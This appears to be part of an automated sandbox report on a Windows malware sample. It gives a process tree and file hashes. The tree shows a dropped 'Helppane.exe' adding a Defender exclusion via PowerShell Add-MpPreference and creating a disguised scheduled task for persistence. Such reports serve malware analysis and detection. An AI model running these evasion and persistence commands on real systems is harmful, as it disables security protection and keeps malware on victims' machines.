- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\Helppane.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Users\Admin\AppData\Roaming\Helppane.exeC:\Users\Admin\AppData\Roaming\Helppane.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\nygrvVIyUpqPTi.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nygrvVIyUpqPTi" /XML "C:\Users\Admin\AppData\Local\Temp\tmp341C.tmp"4⤵
- Creates scheduled task(s)
PID:1720
-
-
C:\Users\Admin\AppData\Roaming\Helppane.exe"C:\Users\Admin\AppData\Roaming\Helppane.exe"4⤵
- Executes dropped EXE
PID:1656
-
-
C:\Users\Admin\AppData\Roaming\Helppane.exe"C:\Users\Admin\AppData\Roaming\Helppane.exe"4⤵
- Executes dropped EXE
PID:1404
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1584
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD555f502c40d35c35ee5dde573cd82675b
SHA1cb532dcf41cca8a018ad46e8c7cd566e949d5222
SHA256a6e2b0fa16116efd9a218a5791dafbeeaa80cbab050b4e08a60ef3f8440e5025
SHA5127a3cfeba3b5ab394884471f0ff5a17a55550893f1edcddd4d1003a6e52fbc071fd5c874bc86c25b16872a9e8e7b28dfe829c28688c68937d4145aaeaac081320
-
Filesize
1KB
MD555f502c40d35c35ee5dde573cd82675b
SHA1cb532dcf41cca8a018ad46e8c7cd566e949d5222
SHA256a6e2b0fa16116efd9a218a5791dafbeeaa80cbab050b4e08a60ef3f8440e5025
SHA5127a3cfeba3b5ab394884471f0ff5a17a55550893f1edcddd4d1003a6e52fbc071fd5c874bc86c25b16872a9e8e7b28dfe829c28688c68937d4145aaeaac081320
-
Filesize
1KB
MD555f502c40d35c35ee5dde573cd82675b
SHA1cb532dcf41cca8a018ad46e8c7cd566e949d5222
SHA256a6e2b0fa16116efd9a218a5791dafbeeaa80cbab050b4e08a60ef3f8440e5025
SHA5127a3cfeba3b5ab394884471f0ff5a17a55550893f1edcddd4d1003a6e52fbc071fd5c874bc86c25b16872a9e8e7b28dfe829c28688c68937d4145aaeaac081320
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56d44f48192b093f1fb885e24f9b9b917
SHA17d6763169e6a2fb72b8378f4a1cfce1d334c3cc2
SHA256ea9e2ba52a4ee659af782f01e96001f98052429054082979857df66cc8570f6d
SHA512748db182f670277dcfe5c6a61b49dcb23a929a664b68e04be8232d7ff17259d405110d56fed7fc9d44dbb6b8e7eacccb8041fd843e4d7448cc7d08f1dfa37321
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56d44f48192b093f1fb885e24f9b9b917
SHA17d6763169e6a2fb72b8378f4a1cfce1d334c3cc2
SHA256ea9e2ba52a4ee659af782f01e96001f98052429054082979857df66cc8570f6d
SHA512748db182f670277dcfe5c6a61b49dcb23a929a664b68e04be8232d7ff17259d405110d56fed7fc9d44dbb6b8e7eacccb8041fd843e4d7448cc7d08f1dfa37321
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56d44f48192b093f1fb885e24f9b9b917
SHA17d6763169e6a2fb72b8378f4a1cfce1d334c3cc2
SHA256ea9e2ba52a4ee659af782f01e96001f98052429054082979857df66cc8570f6d
SHA512748db182f670277dcfe5c6a61b49dcb23a929a664b68e04be8232d7ff17259d405110d56fed7fc9d44dbb6b8e7eacccb8041fd843e4d7448cc7d08f1dfa37321
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56d44f48192b093f1fb885e24f9b9b917
SHA17d6763169e6a2fb72b8378f4a1cfce1d334c3cc2
SHA256ea9e2ba52a4ee659af782f01e96001f98052429054082979857df66cc8570f6d
SHA512748db182f670277dcfe5c6a61b49dcb23a929a664b68e04be8232d7ff17259d405110d56fed7fc9d44dbb6b8e7eacccb8041fd843e4d7448cc7d08f1dfa37321
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56d44f48192b093f1fb885e24f9b9b917
SHA17d6763169e6a2fb72b8378f4a1cfce1d334c3cc2
SHA256ea9e2ba52a4ee659af782f01e96001f98052429054082979857df66cc8570f6d
SHA512748db182f670277dcfe5c6a61b49dcb23a929a664b68e04be8232d7ff17259d405110d56fed7fc9d44dbb6b8e7eacccb8041fd843e4d7448cc7d08f1dfa37321
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60
-
Filesize
988KB
MD50dabd82559d8a8bc397fb053bf73274d
SHA1dabc16a74fc3f9026b19b9631c834848709a59a6
SHA256e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc
SHA5125ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60